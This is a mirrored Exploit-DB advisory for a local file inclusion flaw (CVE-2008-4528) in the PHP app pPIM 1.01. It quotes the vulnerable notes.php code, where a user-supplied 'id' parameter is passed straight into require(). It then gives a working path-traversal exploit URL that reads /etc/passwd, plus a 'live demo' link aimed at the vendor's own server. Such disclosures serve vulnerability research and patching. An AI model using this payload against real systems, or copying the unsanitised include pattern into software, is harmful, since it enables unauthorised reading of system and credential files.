- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6667
- Проверка EDB
-
- Пройдено
- Автор
- JOSS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4528
- Дата публикации
- 2008-10-04
Код:
# pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability
# url: http://www.phlatline.org/docs/files/ppim.zip
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
description of vulnerability:
-----------------------------------------------
the variable 'id' has been not defined in code
and the variable 'id' is sent by the users.
-----------------------------------------------
vuln file: notes.php
vuln code:
x: >...
107: if (isset($_GET["mode"]))
{
if ($_GET["mode"]=="edit")
{
if (isset($_GET['id']))
{
$notefile = $_GET['id'];
if ($notefile == "new")
{
$title = "";
$notes = "";
}
else
{
$temp = "notes/" . $notefile;
require($temp);
123: }
x: <...
x: }}}
exploit: GET /notes.php?mode=edit&id=[file]
sample (xpl): http://www.localhost.com/notes.php?mode=edit&id=../../../../../../../../../../etc/passwd
live demo:
http://www.phlatline.org/docs/demos/ppim/notes.php?mode=edit&id=../notes.php
# milw0rm.com [2008-10-04]- Источник
- www.exploit-db.com
